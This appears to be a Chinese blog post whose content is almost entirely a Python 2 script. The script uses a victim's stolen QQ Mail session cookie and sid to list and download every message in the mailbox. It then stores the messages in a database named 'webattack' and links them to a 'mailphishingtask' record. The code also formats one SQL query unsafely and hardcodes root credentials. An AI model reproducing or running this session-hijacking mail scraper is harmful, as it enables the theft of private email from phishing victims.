1. 程式人生 > >利用cookie爬取QQ郵箱的python指令碼

利用cookie爬取QQ郵箱的python指令碼

目標郵箱的cookie和sid儲存同一目錄下的txt檔案中。

以下是全部程式碼

# -*- coding: utf-8 -*-
import requests
import time
from bs4 import BeautifulSoup
import re
import sys
import json
import pymysql


def ct_content(url,payload):
    s = requests.session()

    header = {\

            'Referer': 'https://mail.qq.com/cgi-bin/frame_html?t=newwin_frame&sid=M6EI2PkDteRzaXkj&url=/cgi-bin/readmail?folderid=1%26folderkey=1%26t=readmail%26mailid=ZC4411-kQP8LA2p7r_ALDxmjE83W82%26mode=pre%26maxage=3600%26base=12.870000000000001%26ver=36726'
, 'User-Agent':'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/64.0.3282.167 Safari/537.36', 'Upgrade-Insecure-Requests':'1'} f = open('cookie.txt', 'r') t = f.read() header['cookie'] = t response = s.get(url, headers=header, params=payload, timeout=80
) html = response.text return html def get_mailid(sid): ids = [] for page in range(1): url = "https://mail.qq.com/cgi-bin/mail_list?" payload ='sid={0:s}=personal&folderkey=-3&page={0:s}&stype=myfolders&ver=333674.0&cachemod=maillist&cacheage=7200&r='
.format(sid,page) html = ct_content(url,payload) soup = BeautifulSoup(html, 'lxml') where = soup.find_all("input") for i in where: t = str(i) xp = re.findall("value=\"(.*?)\"/>", t) if (len(str(xp)[2:-2]) == 30): id=str(xp)[2:-2] #print id ids.append(id) print len(ids) return ids def get_sid(): f = open('sid.txt', 'r') t = f.read() return t def get_mail(mailid,sid): url = "https://mail.qq.com/cgi-bin/readmail?" payload = 'folderid=1&folderkey=1&t=readmail&mailid={0:s}&mode=pre&maxage=3600&base=12.57&ver=16137&sid={1:s}'.format(mailid, sid) #print payload html = ct_content(url, payload) html = html.replace("gb18030","utf-8") return html #soup = BeautifulSoup(html, 'lxml') def get_sub(html): soup = BeautifulSoup(html, 'lxml') where = soup.find_all("title") return where[0].string def fs (key, cook): cook = cook.replace('ssid', '') kl = cook.find(key) fl = cook.find(";", kl) return cook[kl+len(key)+1:fl] def get_cookie(): f = open('cookie.txt', 'r') t = f.read() value = {} value['sid'] = fs('sid', t) ''' value['pgv_pvi'] = fs('pgv_pvi',t) value['pt2gguin'] = fs('pt2gguin',t) value['foxacc'] = fs('foxacc', t) value['p_skey'] = fs('p_skey', t) value['pt4_token'] = fs('pt4_token', t) value['qm_ptsk'] = fs('qm_ptsk', t) value['sid'] = fs('sid', t) value['RK'] = fs('RK', t) value['skey'] = fs('skey', t) value['uin'] = fs('uin', t) value['ptcz'] = fs('ptcz',t) value['edition'] = fs('edition',t) value['ptui_loginuin'] = fs('ptui_loginuin',t) value['pgv_pvid'] = fs('pgv_pvid',t) value['ptisp'] = fs('ptisp',t) value['pgv_si'] = fs('pgv_si',t) value['wimrefreshrun'] = fs('wimrefreshrun',t) value['qm_antisky'] = fs('qm_antisky',t) value['qm_domain'] = fs('qm_domain',t) value['qm_flag'] = fs('qm_flag',t) value['qm_loginfrom'] = fs('qm_loginfrom',t) ''' return value def main(): #os.system('calc') reload(sys) sys.setdefaultencoding('utf8') key = sys.argv[1] conn = pymysql.connect(host='127.0.0.1', port=3306, user='root', passwd='root', db='webattack',charset='utf8') cursor = conn.cursor() global cookie #cookie = get_cookie() #print cookie subs = [] sid =get_sid() #print sid mailids = get_mailid(sid) print len(mailids) mails = [] for id in mailids: mail = get_mail(id,sid) mails.append(mail) sub = get_sub(mail) subs.append(sub) sql_select = "SELECT id,uid,target FROM mailphishingtask where tkey='%s' ;" % key cursor.execute(sql_select) data = cursor.fetchone() tid = int(data[0]) uid = int(data[1]) mailbox = data[2] addtime = int(time.time()) for i in range(len(mailids)): ls = [[1], ] l = [mailids[i], mails[i],subs[i],tid,uid,mailbox,addtime] ls.append(l) del ls[0] sql = 'INSERT INTO mails (mailid,mailcontent,sub,pid,uid,mailbox,addtime) VALUES (%s,%s,%s,%s,%s,%s,%s)' cursor = conn.cursor() cursor.executemany(sql, ls) cursor.close() conn.commit() conn.close() if __name__ == '__main__': main()